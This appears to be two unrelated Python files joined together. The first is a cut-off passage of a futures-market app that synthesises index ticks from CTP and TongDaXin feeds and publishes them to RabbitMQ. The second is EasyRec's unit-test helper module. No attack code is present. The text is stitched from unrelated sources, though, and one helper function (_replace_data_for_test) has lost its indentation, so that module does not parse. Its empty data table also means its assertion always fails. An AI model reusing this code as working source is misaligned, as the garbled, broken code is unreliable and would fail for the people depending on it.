                                 user=conf.get('user', 'admin'),
                                 password=conf.get('password', 'admin'),
                                 channel_number=conf.get('channel_number', 1),
                                 queue_name=conf.get('queue_name', ''),
                                 routing_key=conf.get('routing_key', 'default'),
                                 exchange=conf.get('exchange', 'x_fanout_idx_tick'))
            self.write_log(f'创建发布器成功')
        except Exception as ex:
            self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))

    # ----------------------------------------------------------------------
    def registerEvent(self):
        """Register event listeners."""
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)

    def process_timer_event(self, event):
        """Timer callback: run the health check at most once per minute."""
        self.dt = datetime.now()
        if self.last_minute and self.dt.minute == self.last_minute:
            return
        self.last_minute = self.dt.minute
        self.check_status()

    def check_status(self):
        """Periodic check: (re-)subscribe every configured contract without a live tick."""
        if not self.md_api:
            self.status.update({'con': False})
            self.write_log(f'行情接口未连接')
            return

        dt_now = datetime.now()
        # scan the contract configuration file
        for underly_symbol, info in self.all_contracts.items():
            # honor the explicit subscription list (e.g. ['RB', 'IF']) when present
            if len(self.selected_underly_symbols) > 0 and underly_symbol not in self.selected_underly_symbols:
                continue
            # day-session-only products are not subscribed during the night session
            if dt_now.hour < 4 or dt_now.hour > 20:
                if underly_symbol in MARKET_DAY_ONLY:
                    continue
            # all real contracts of this underlying
            symbols = info.get('symbols', {})
            # exchange of this underlying
            exchange = info.get('exchange', 'LOCAL')
            # ticks already received for this underlying
            tick_dict = self.ticks.get(underly_symbol, {})
            # BUGFIX: iterate over a snapshot — expired symbols are popped below,
            # and mutating a dict while iterating its keys raises RuntimeError.
            for symbol in list(symbols.keys()):
                # full symbol => vn symbol, e.g. ZC2109 => ZC109, RB2110 => rb2110
                vn_symbol = get_real_symbol_by_exchange(symbol, Exchange(exchange))
                # NOTE(review): lexicographic comparison of a 3/4-digit expiry suffix
                # (e.g. '2109') against '%Y%m%d' (8 digits) — confirm this prunes as intended.
                if symbol.replace(underly_symbol, '') < dt_now.strftime('%Y%m%d'):
                    self.write_log(f'移除早于当月的合约{symbol}')
                    symbols.pop(symbol, None)
                    continue
                # symbol with exchange suffix
                vt_symbol = f'{vn_symbol}.{exchange}'
                # symbol_exchange_map is a global used by the ctp md api; keep it updated
                if vn_symbol not in symbol_exchange_map:
                    symbol_exchange_map.update({vn_symbol: Exchange(exchange)})
                # no live tick for this contract => issue a subscription
                # NOTE(review): tick_dict is keyed by tick.symbol (see on_tick), not
                # vt_symbol, so this test may always be true — verify intent.
                if vt_symbol not in tick_dict:
                    req = SubscribeRequest(
                        symbol=vn_symbol,
                        exchange=Exchange(exchange)
                    )
                    self.subscribe(req)
            # record underlying symbol <=> number of real contracts
            self.underly_symbols_num_dict.update({underly_symbol: len(symbols.keys())})

    def connect(self, *args, **kwargs):
        """
        Connect the CTP market-data feed and the RabbitMQ publisher.
        :param kwargs: md_address / userid / password / brokerid, plus a
            'rabbit_config' dict for the publisher.
        :return:
        """
        # BUGFIX: closed the parenthesis in the log message
        self.write_log(f'connect({kwargs})')
        # connect the ctp md server
        md_address = kwargs.get('md_address')
        userid = kwargs.get('userid')
        password = kwargs.get('password')
        brokerid = kwargs.get('brokerid')
        if not self.md_api:
            self.write_log(f'创建ctp行情服务器{md_address}')
            self.md_api = CtpMdApi(gateway=self)
            self.md_api.connect(address=md_address,
                                userid=userid,
                                password=password,
                                brokerid=brokerid)

        # connect rabbit MQ
        rabbit_config = kwargs.get('rabbit_config', {})
        self.write_log(f'创建rabbitMQ 消息推送桩,{rabbit_config}')
        self.conf.update(rabbit_config)
        self.create_publisher(self.conf)

    def subscribe(self, req: SubscribeRequest):
        """Record the subscription locally and forward it to the md api."""
        self.write_log(f'engine:订阅合约: {req.vt_symbol}')
        if req.vt_symbol not in self.subscribed_symbols:
            self.subscribed_symbols.add(req.vt_symbol)
        if self.md_api:
            self.md_api.subscribe(req)

    def on_tick(self, tick):
        """Tick callback: accumulate per-underlying ticks and publish a synthetic index tick."""
        # drop ticks whose timestamp is too far from the current time
        if abs((tick.datetime - self.dt).total_seconds()) > 20:
            return

        short_symbol = get_underlying_symbol(tick.symbol).upper()
        # first tick for this underlying: just record it
        tick_dict = self.ticks.get(short_symbol, None)
        if tick_dict is None:
            tick_dict = {tick.symbol: tick}
            self.ticks.update({short_symbol: tick_dict})
            return

        # datetime of the last synthesized index tick for this underlying
        last_dt = self.last_tick_dt.get(short_symbol, tick.datetime)
        # synthesize the index at most once per second
        if last_dt and tick.datetime.second != last_dt.second:
            all_amount = 0
            all_interest = 0
            all_volume = 0
            all_ask1 = 0
            all_bid1 = 0
            last_price = 0
            ask_price_1 = 0
            bid_price_1 = 0
            mi_tick = None
            # not enough contracts accumulated yet => skip
            n = self.underly_symbols_num_dict.get(short_symbol, 1)
            if len(tick_dict) < min(n * 0.8, 3):
                self.write_log(f'{short_symbol}合约数据{len(tick_dict)}不足{n} 0.8,暂不合成指数')
                return
            # accumulate open interest / turnover / volume; find the dominant contract
            for t in tick_dict.values():
                all_interest += t.open_interest
                all_amount += t.last_price * t.open_interest
                all_volume += t.volume
                all_ask1 += t.ask_price_1 * t.open_interest
                all_bid1 += t.bid_price_1 * t.open_interest
                if mi_tick is None or mi_tick.open_interest < t.open_interest:
                    mi_tick = t
            # open-interest-weighted last price
            if all_interest > 0 and all_amount > 0:
                last_price = round(float(all_amount / all_interest), 4)
            # ask 1
            if all_ask1 > 0 and all_interest > 0:
                ask_price_1 = round(float(all_ask1 / all_interest), 4)
            # bid 1
            if all_bid1 > 0 and all_interest > 0:
                bid_price_1 = round(float(all_bid1 / all_interest), 4)

            if mi_tick and last_price > 0:
                if self.pub:
                    d = copy.copy(mi_tick.__dict__)
                    # datetime => string
                    if isinstance(mi_tick.datetime, datetime):
                        d.update({'datetime': mi_tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
                    # enum => string
                    d.update({'exchange': mi_tick.exchange.value})
                    d.update({'symbol': f'{short_symbol}99', 'vt_symbol': f'{short_symbol}99.{mi_tick.exchange.value}'})
                    # overwrite the dominant contract's figures with the synthesized index values
                    d.update({'open_interest': all_interest, 'volume': all_volume,
                              'last_price': last_price, 'ask_price_1': ask_price_1, 'bid_price_1': bid_price_1})
                    d = json.dumps(d)
                    self.pub.pub(d)
                # remember when we last published for this underlying
                self.last_tick_dt.update({short_symbol: tick.datetime})

        tick_dict.update({tick.symbol: tick})
        self.ticks.update({short_symbol: tick_dict})

    def on_custom_tick(self, tick):
        """Unused hook required by the gateway interface."""
        pass
class IndexTickPublisher(BaseEngine):
    """
    Index tick publishing service (TDX edition).

    Pulls index ticks from a TongDaXin (pytdx) market-data server and
    publishes them to RabbitMQ.
    """

    # ----------------------------------------------------------------------
    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """"""
        super(IndexTickPublisher, self).__init__(
            main_engine, event_engine, APP_NAME)

        self.main_engine = main_engine
        self.event_engine = event_engine
        self.create_logger(logger_name=APP_NAME)

        self.last_minute = None
        self.registerEvent()

        self.req_interval = 0.5  # request throttle: 500 ms between polls
        self.req_id = 0          # request sequence number
        self.connection_status = False  # connection status

        self.symbol_exchange_dict = {}  # tdx symbol -> vn Exchange
        self.symbol_market_dict = {}    # tdx symbol -> tdx market id
        self.symbol_tick_dict = {}      # tdx symbol -> last TickData
        # self.queue = Queue()          # request queue
        self.pool = None                # thread pool
        self.req_thread = None          # polling thread

        self.ip_list = TDX_FUTURE_HOSTS

        # tdx api
        self.fail_ip_dict = {}  # failed server "ip:port" -> cool-down counter (minutes)
        self.best_ip = None
        self.best_port = None
        self.best_name = None
        self.api = None            # API session object
        self.last_tick_dt = None   # datetime of the session's last tick
        self.last_sort_speed_dt = None
        self.instrument_count = 50000
        self.has_qry_instrument = False

        # rabbitmq settings from vt_setting.json
        self.conf = {}
        self.pub = None

    def write_error(self, content: str):
        """Log *content* at ERROR level."""
        self.write_log(msg=content, level=ERROR)

    def create_publisher(self, conf):
        """Create the RabbitMQ message publisher (idempotent)."""
        if self.pub:
            return
        try:
            # message publisher
            self.pub = publisher(host=conf.get('host', 'localhost'),
                                 port=conf.get('port', 5672),
                                 user=conf.get('user', 'admin'),
                                 password=conf.get('password', 'admin'),
                                 channel_number=conf.get('channel_number', 1),
                                 queue_name=conf.get('queue_name', ''),
                                 routing_key=conf.get('routing_key', 'default'),
                                 exchange=conf.get('exchange', 'x_fanout_idx_tick'))
        except Exception as ex:
            self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))

    # ----------------------------------------------------------------------
    def registerEvent(self):
        """Register event listeners."""
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)

    def process_timer_event(self, event):
        """Timer callback: decay the failed-IP counters and run the health check once per minute."""
        dt = datetime.now()
        if dt.minute == self.last_minute:
            return
        # BUGFIX: last_minute was never updated, so the once-per-minute guard
        # above never triggered and check_status ran on every timer event.
        self.last_minute = dt.minute

        # decay the cool-down counter of every failed IP
        for k in list(self.fail_ip_dict.keys()):
            c = self.fail_ip_dict.get(k, 0)
            if c <= 0:
                self.fail_ip_dict.pop(k, None)
            else:
                c -= 1
                self.fail_ip_dict.update({k: c})

        self.check_status()

    # ----------------------------------------------------------------------
    def ping(self, ip, port=7709):
        """
        Ping one market-data server.
        :param ip: server address
        :param port: server port
        :return: round-trip time in ms (10000 ms on failure)
        """
        apix = TdxExHq_API()
        __time1 = datetime.now()
        try:
            with apix.connect(ip, port):
                if apix.get_instrument_count() > 10000:
                    _timestamp = (datetime.now() - __time1).total_seconds() * 1000
                    self.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
                    return _timestamp
                else:
                    self.write_log(u'该服务器IP {}无响应.'.format(ip))
                    return timedelta(seconds=10).total_seconds() * 1000
        except Exception as ex:
            self.write_error(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
            return timedelta(seconds=10).total_seconds() * 1000

    def sort_ip_speed(self):
        """
        Ping every configured server and sort the host list by round-trip time.
        :return:
        """
        speed_result = []
        for x in self.ip_list:
            speed = self.ping(x['ip'], x['port'])
            x.update({'speed': speed})
            speed_result.append(copy.copy(x))

        # fastest first
        self.ip_list = sorted(speed_result, key=lambda s: s['speed'])
        self.write_log(u'服务器访问速度排序:{}'.format(self.ip_list))

    # ----------------------------------------------------------------------
    def select_best_ip(self):
        """
        Pick the fastest responsive server not on the fail list.
        :return: (ip, port, name), or (None, None, None) when nothing qualifies
        """
        self.write_log(u'选择通达信行情服务器')
        # re-measure speeds at most once a minute
        if self.last_sort_speed_dt is None or (datetime.now() - self.last_sort_speed_dt).total_seconds() > 60:
            self.sort_ip_speed()
            self.last_sort_speed_dt = datetime.now()

        valid_ip_list = [x for x in self.ip_list if x.get('speed', 10000) < 10000]
        if len(valid_ip_list) == 0:
            self.write_error(u'未能找到合适速度得行情服务器')
            return None, None, None
        for server in valid_ip_list:
            ip = server.get('ip')
            port = server.get('port')
            name = server.get('name', '{}:{}'.format(ip, port))
            if '{}:{}'.format(ip, port) in self.fail_ip_dict:
                self.write_log(u'{}:{}属于上次异常IP地址,忽略'.format(ip, port))
                continue
            return ip, port, name
        return None, None, None

    def connect(self, rabbit_config: dict):
        """
        Connect to a TDX server; start the RabbitMQ publisher and the polling thread.
        :param rabbit_config: rabbitmq settings dict
        :return:
        """
        if self.connection_status:
            # NOTE(review): with `or`, the second test is redundant when api is
            # not None and unreachable-true when api is None — probably meant
            # `and`; behavior kept as-is.
            if self.api is not None or getattr(self.api, "client", None) is not None:
                self.write_log(u'当前已经连接,不需要重新连接')
                return

        self.write_log(u'开始通达信行情服务器')

        try:
            self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
            # pick the fastest server
            self.best_ip, self.best_port, self.best_name = self.select_best_ip()
            if self.best_ip is None or self.best_port is None:
                # NOTE(review): falls through to connect(None, None); the
                # resulting exception is handled below. Verify intent.
                self.write_error(u'未能选择到服务器')
            self.write_log(u'api 选择 {}: {}:{}'.format(self.best_name, self.best_ip, self.best_port))
            self.api.connect(self.best_ip, self.best_port)
            # sanity check: ask for the market's contract count
            c = self.api.get_instrument_count()
            if c is None or c < 10:
                err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
                self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                self.write_error(err_msg)
            else:
                self.write_log(u'创建tdx连接')
                self.last_tick_dt = datetime.now()
                self.connection_status = True
                self.instrument_count = c
        except Exception as ex:
            self.write_error(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
            self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
            return

        # refresh symbol_exchange_dict / symbol_market_dict
        self.write_log(u'查询合约')
        self.qry_instrument()

        self.conf.update(rabbit_config)
        self.create_publisher(self.conf)

        self.req_thread = Thread(target=self.run)
        self.req_thread.start()

    def reconnect(self):
        """
        Reconnect to the (re-)selected best server.
        :return:
        """
        try:
            self.best_ip, self.best_port, self.best_name = self.select_best_ip()
            self.api = TdxExHq_API(heartbeat=True, auto_retry=True)
            self.api.connect(self.best_ip, self.best_port)
            # sanity check: ask for the market's contract count
            c = self.api.get_instrument_count()
            if c is None or c < 10:
                err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
                self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                self.write_error(err_msg)
            else:
                self.write_log(u'重新创建tdx连接')
                sleep(1)
        except Exception as ex:
            self.write_error(u'重新连接服务器异常:{},{}'.format(str(ex), traceback.format_exc()))
            self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
            return

    def close(self):
        """Stop the polling thread and shut down the publisher."""
        self.write_log(u'退出tdx API')
        self.connection_status = False

        if self.req_thread is not None:
            self.write_log(u'退出请求线程')
            self.req_thread.join()

        if self.pub:
            self.write_log(u'退出rabbitMQ 发布器')
            self.pub.exit()

    def check_status(self):
        """Log the most recent tick and reconnect when the feed is stale (>60s without a tick)."""
        self.write_log(u'检查tdx接口状态')
        if len(self.symbol_tick_dict) > 0:
            # BUGFIX: dict.keys() is a view and not subscriptable in Python 3 —
            # the original `self.symbol_tick_dict.keys()[0]` raised TypeError.
            k = next(iter(self.symbol_tick_dict))
            tick = self.symbol_tick_dict.get(k, None)
            if tick:
                self.write_log(f'{tick.vt_symbol}: {tick.datetime}, price:{tick.last_price}')
        else:
            self.write_log(f'目前没有收到tick')

        # (re)connect when not connected yet, or when ticks stopped for over a minute
        over_time = self.last_tick_dt is None or (datetime.now() - self.last_tick_dt).total_seconds() > 60
        if not self.connection_status or self.api is None or over_time:
            self.write_log(u'tdx还没有启动连接,就启动连接')
            self.close()
            self.api = None
            self.reconnect()
        else:
            self.write_log(u'tdx接口状态正常')

    def qry_instrument(self):
        """
        Query and cache contract information (runs once per session).
        :return:
        """
        if not self.connection_status:
            self.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
            return

        if self.has_qry_instrument:
            self.write_error(u'已经查询过一次合约信息,不再查询')
            return

        # fetch all contract records in chunks of 500
        num = self.api.get_instrument_count()
        if not isinstance(num, int):
            return
        all_contacts = sum(
            [self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
        # [{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]

        # keep only index contracts (code ending in 'L9'); record market id and exchange
        for tdx_contract in all_contacts:
            tdx_symbol = tdx_contract.get('code', None)
            if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
                continue
            tdx_market_id = tdx_contract.get('market')
            self.symbol_market_dict[tdx_symbol] = tdx_market_id
            if tdx_market_id == 47:  # CFFEX
                self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
            elif tdx_market_id == 28:  # CZCE
                self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
            elif tdx_market_id == 29:  # DCE
                self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
            elif tdx_market_id == 30:  # SHFE + INE
                self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
            elif tdx_market_id == 60:  # dominant contracts
                self.write_log(u'主力合约:{}'.format(tdx_contract))

        self.has_qry_instrument = True

    def run(self):
        """Polling loop: fetch the index board every req_interval seconds until disconnected."""
        try:
            last_dt = datetime.now()
            self.write_log(u'开始运行tdx,{}'.format(last_dt))
            while self.connection_status:
                try:
                    self.process_index_req()
                except BrokenPipeError as bex:
                    self.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
                    self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                    self.reconnect()
                    sleep(5)
                    break
                except Exception as ex:
                    self.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
                    self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
                    self.reconnect()
                sleep(self.req_interval)
                dt = datetime.now()
                if last_dt.minute != dt.minute:
                    self.write_log('tdxcheck point. {},last_tick_dt:{}'.format(dt, self.last_tick_dt))
                    last_dt = dt
        except Exception as ex:
            self.write_error(u'tdx pool.run exception:{},{}'.format(str(ex), traceback.format_exc()))
        self.write_error(u'tdx 线程 {}退出'.format(datetime.now()))

    def process_index_req(self):
        """Poll the TDX index board (market 42) and publish every in-session index tick."""
        # all quotes of the index board
        rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
        if rt_list is None or len(rt_list) == 0:
            self.write_log(u'tdx:get_instrument_quote_list() rt_list为空')
            return
        # remember when this session last produced data
        self.last_tick_dt = datetime.now()

        for d in list(rt_list):
            tdx_symbol = d.get('code', None)
            # robustness: skip records without a code (the original raised
            # AttributeError on None.endswith)
            if tdx_symbol is None:
                continue
            if tdx_symbol.endswith('L9'):
                vn_symbol = tdx_symbol.replace('L9', '99').upper()
            else:
                vn_symbol = tdx_symbol.upper()
            tick_datetime = datetime.now()
            # microsecond fix-up: two polls can land in the same second
            last_tick = self.symbol_tick_dict.get(vn_symbol, None)
            if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
                # same second (ignoring microseconds) as the previous tick => stamp .5s
                tick_datetime = tick_datetime.replace(microsecond=500)
            else:
                tick_datetime = tick_datetime.replace(microsecond=0)
            # TDX reports INE energy contracts under SHFE; correct that here
            if vn_symbol in ['NR99', 'SC99']:
                exchange = Exchange.INE
            else:
                exchange = self.symbol_exchange_dict.get(tdx_symbol, Exchange.LOCAL)
            tick = TickData(
                gateway_name='tdx',
                symbol=vn_symbol,
                datetime=tick_datetime,
                exchange=exchange
            )
            # NOTE(review): field mapping kept from the original pytdx names —
            # confirm 'MaiChu' really carries the last price for this board.
            tick.pre_close = float(d.get('ZuoJie', 0.0))
            tick.high_price = float(d.get('ZuiGao', 0.0))
            tick.open_price = float(d.get('JinKai', 0.0))
            tick.low_price = float(d.get('ZuiDi', 0.0))
            tick.last_price = float(d.get('MaiChu', 0.0))
            tick.volume = int(d.get('XianLiang', 0))
            tick.open_interest = d.get('ChiCangLiang')
            tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
            tick.date = tick.datetime.strftime('%Y-%m-%d')
            tick.trading_day = get_trading_date(tick_datetime)
            # indexes have no price limits; approximate with +/-10% of previous close
            tick.limit_up = tick.pre_close * 1.1
            tick.limit_down = tick.pre_close * 0.9
            # only one depth level is available
            tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
            tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
            tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
            tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
            underlying_symbol = vn_symbol.replace('99', '').upper()
            # drop ticks outside trading hours
            if tick.exchange is Exchange.CFFEX:
                if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
                    continue
                if tick.datetime.hour == 9 and tick.datetime.minute < 15:
                    continue
                # morning break 11:30~12:00
                if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
                    continue
                if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
                    continue
                if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
                    continue
            else:  # DCE / CZCE / SHFE / INE
                # hours with no session at all
                if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
                    continue
                # morning break 10:15~10:30
                if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
                    continue
                # morning break 11:30~12:00
                if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
                    continue
                # lunch break 13:00~13:30
                if tick.datetime.hour == 13 and tick.datetime.minute < 30:
                    continue
                # overnight break 2:30~3:00
                if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
                    continue
                # night sessions closing at 23:00
                if underlying_symbol in NIGHT_MARKET_23:
                    if tick.datetime.hour in [23, 0, 1, 2]:
                        continue
                # SHFE night sessions closing at 1:00
                if underlying_symbol in NIGHT_MARKET_SQ2:
                    if tick.datetime.hour in [1, 2]:
                        continue
                # day-session-only products produce nothing at night
                if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
                    continue
            self.symbol_tick_dict[tick.symbol] = tick

            if self.pub:
                d = copy.copy(tick.__dict__)
                if isinstance(tick.datetime, datetime):
                    d.update({'datetime': tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
                d.update({'exchange': tick.exchange.value})
                d = json.dumps(d)
                self.pub.pub(d)
|
test_utils.py | # -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
"""Contains functions which are convenient for unit testing.
isort:skip_file
"""
from future import standard_library
standard_library.install_aliases()
import yaml
import glob
import json
import logging
import os
import random
import shutil
import string
import subprocess
import time
from multiprocessing import Process
from subprocess import getstatusoutput
from tensorflow.python.platform import gfile
import numpy as np
from easy_rec.python.protos.train_pb2 import DistributionStrategy
from easy_rec.python.utils import config_util
from easy_rec.python.protos.pipeline_pb2 import EasyRecConfig
TEST_DIR = './tmp/easy_rec_test'
def get_hdfs_tmp_dir(test_dir):
  """Create a randomly named sub-directory of *test_dir* on HDFS; return its path."""
  assert isinstance(test_dir, str)
  rand_name = ''.join(
      random.choice(string.ascii_letters + string.digits) for _ in range(8))
  rand_dir = os.path.join(test_dir, rand_name)
  gfile.MkDir(rand_dir)
  return rand_dir
def get_tmp_dir():
  """Return a fresh, empty, randomly named directory under TEST_DIR.

  Honors the TEST_DIR environment variable (which also rebinds the module
  global) and recreates the directory from scratch if it already exists.
  """
  global TEST_DIR
  if os.environ.get('TEST_DIR', '') != '':
    TEST_DIR = os.environ['TEST_DIR']
  rand_name = ''.join(
      random.choice(string.ascii_letters + string.digits) for _ in range(8))
  dir_name = os.path.join(TEST_DIR, rand_name)
  if os.path.exists(dir_name):
    shutil.rmtree(dir_name)
  os.makedirs(dir_name)
  return dir_name
def clear_all_tmp_dirs():
  """Delete TEST_DIR and everything beneath it (raises if it does not exist)."""
  shutil.rmtree(TEST_DIR)
def set_gpu_id(gpu_id_str):
  """Point CUDA_VISIBLE_DEVICES at *gpu_id_str*; None hides all GPUs."""
  os.environ['CUDA_VISIBLE_DEVICES'] = '' if gpu_id_str is None else gpu_id_str
def get_available_gpus():
  """Return GPU ids from $TEST_DEVICES, or by probing /dev/nvidia* device nodes."""
  if 'TEST_DEVICES' in os.environ:
    gpu_ids = os.environ['TEST_DEVICES'].split(',')
  else:
    gpu_ids = [
        dev.replace('/dev/nvidia', '') for dev in glob.glob('/dev/nvidia[0-9]*')
    ]
  logging.info('available gpus %s' % gpu_ids)
  return gpu_ids
def run_cmd(cmd_str, log_file):
  """Launch *cmd_str* through a shell, teeing stdout+stderr into *log_file*.

  Returns the subprocess.Popen handle (caller is expected to wait()).
  """
  flattened = cmd_str.replace('\r', ' ').replace('\n', ' ')
  logging.info('RUNCMD: %s > %s 2>&1 ' % (flattened, log_file))
  with open(log_file, 'w') as sink:
    # the child inherits the fd, so closing our handle after spawn is fine
    return subprocess.Popen(
        flattened, stdout=sink, stderr=subprocess.STDOUT, shell=True)
def RunAsSubprocess(f):
  """Function decorator to run *f* in a subprocess and wait for it.

  Useful when *f* starts a TF session, because TensorFlow GPU memory is only
  released when the owning process exits.

  Raises:
    AssertionError: if the subprocess exits non-zero, or is still alive after
      the 600s join timeout (exitcode is then None).
  """
  import functools

  # BUGFIX: preserve the wrapped function's __name__/__doc__ for debugging
  @functools.wraps(f)
  def wrapped_f(*args, **kw):
    p = Process(target=f, args=args, kwargs=kw)
    p.start()
    p.join(timeout=600)
    assert p.exitcode == 0, 'subprocess run failed: %s' % f.__name__

  return wrapped_f
def clean_up(test_dir):
  """Remove *test_dir* (when given) and return the process to CPU-only mode."""
  if test_dir is not None:
    shutil.rmtree(test_dir)
  # back to cpu mode
  set_gpu_id(None)
def clean_up_hdfs(test_dir):
  """Remove *test_dir* from HDFS if present and return to CPU-only mode."""
  if gfile.Exists(test_dir):
    gfile.DeleteRecursively(test_dir)
  set_gpu_id(None)
def _replace_data_for_test(data_path):
"""Replace real data with test data."""
test_data = {}
change = False
releated_datasets = []
for k, config in test_data.items():
if k in data_path:
releated_datasets.append(k)
# if there are multiple keyword detected, use the longest one
if len(releated_datasets) > 0:
score = [len(k) for k in releated_datasets]
best_match = np.argmax(score)
data_path = test_data[releated_datasets[best_match]]
change = True
assert change, 'Failed to replace data with test data'
return data_path
def _load_config_for_test(pipeline_config_path, test_dir, total_steps=50):
  """Load a pipeline config and shrink it for a short local test run.

  Redirects model_dir into *test_dir*, caps training at *total_steps*,
  limits eval examples, and disables epoch-based termination.
  """
  pipeline_config = config_util.get_configs_from_pipeline_file(
      pipeline_config_path)

  pipeline_config.train_config.num_steps = total_steps
  # redirect the model dir into the per-test directory
  pipeline_config.model_dir = test_dir + '/train'
  logging.info('test_model_dir %s' % pipeline_config.model_dir)
  pipeline_config.eval_config.num_examples = max(
      10, pipeline_config.data_config.batch_size)
  pipeline_config.data_config.num_epochs = 0
  return pipeline_config
def test_datahub_train_eval(pipeline_config_path,
                            test_dir,
                            process_pipeline_func=None,
                            hyperparam_str='',
                            total_steps=50,
                            post_check_func=None):
  """Run a short train+eval cycle for a DataHub-based pipeline config.

  Args:
    pipeline_config_path: path to a pipeline config file, or an EasyRecConfig.
    test_dir: directory for the adapted config, model dir, and logs.
    process_pipeline_func: optional callable to mutate the config before saving.
    hyperparam_str: extra command-line arguments appended to the train command.
    total_steps: training steps for the shortened run.
    post_check_func: optional callable(pipeline_config) run after success.

  Returns:
    True on success (or post_check_func's result); False if training failed.
  """
  gpus = get_available_gpus()
  if len(gpus) > 0:
    set_gpu_id(gpus[0])
  else:
    set_gpu_id(None)

  if not isinstance(pipeline_config_path, EasyRecConfig):
    logging.info('testing pipeline config %s' % pipeline_config_path)
  # drop any leftover cluster spec so the run is single-process
  if 'TF_CONFIG' in os.environ:
    del os.environ['TF_CONFIG']

  if isinstance(pipeline_config_path, EasyRecConfig):
    pipeline_config = pipeline_config_path
  else:
    pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
                                            total_steps)
  # force non-distributed, single-GPU, async training
  pipeline_config.train_config.train_distribute = 0
  pipeline_config.train_config.num_gpus_per_worker = 1
  pipeline_config.train_config.sync_replicas = False
  if process_pipeline_func is not None:
    assert callable(process_pipeline_func)
    pipeline_config = process_pipeline_func(pipeline_config)
  config_util.save_pipeline_config(pipeline_config, test_dir)
  test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
  # NOTE(review): uses 'python3' while the sibling helpers use 'python' — confirm intended
  train_cmd = 'python3 -m easy_rec.python.train_eval --pipeline_config_path %s %s' % (
      test_pipeline_config_path, hyperparam_str)
  proc = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
  proc.wait()
  if proc.returncode != 0:
    logging.error('train %s failed' % test_pipeline_config_path)
    return False
  if post_check_func:
    return post_check_func(pipeline_config)
  return True
def _Load_config_for_test_eval(pipeline_config_path):
  """Load a pipeline config unchanged (used by the eval/export test helpers).

  NOTE(review): name violates snake_case (capital L); kept for existing callers.
  """
  pipeline_config = config_util.get_configs_from_pipeline_file(
      pipeline_config_path)
  return pipeline_config
def test_single_train_eval(pipeline_config_path,
                           test_dir,
                           process_pipeline_func=None,
                           hyperparam_str='',
                           total_steps=50,
                           post_check_func=None,
                           check_mode=False):
  """Run a short single-process train+eval cycle.

  Args:
    pipeline_config_path: path to a pipeline config file, or an EasyRecConfig.
    test_dir: directory for the adapted config, model dir, and logs.
    process_pipeline_func: optional callable to mutate the config before saving.
    hyperparam_str: extra command-line arguments for train_eval.
    total_steps: training steps for the shortened run.
    post_check_func: optional callable(pipeline_config) run after success.
    check_mode: pass --check_mode to train_eval.

  Returns:
    True on success (or post_check_func's result); False if training failed.
  """
  gpus = get_available_gpus()
  if len(gpus) > 0:
    set_gpu_id(gpus[0])
  else:
    set_gpu_id(None)

  if not isinstance(pipeline_config_path, EasyRecConfig):
    logging.info('testing pipeline config %s' % pipeline_config_path)
  # drop any leftover cluster spec so the run is single-process
  if 'TF_CONFIG' in os.environ:
    del os.environ['TF_CONFIG']

  if isinstance(pipeline_config_path, EasyRecConfig):
    pipeline_config = pipeline_config_path
  else:
    pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
                                            total_steps)
  # force non-distributed, single-GPU, async training
  pipeline_config.train_config.train_distribute = 0
  pipeline_config.train_config.num_gpus_per_worker = 1
  pipeline_config.train_config.sync_replicas = False
  if process_pipeline_func is not None:
    assert callable(process_pipeline_func)
    pipeline_config = process_pipeline_func(pipeline_config)
  config_util.save_pipeline_config(pipeline_config, test_dir)
  test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
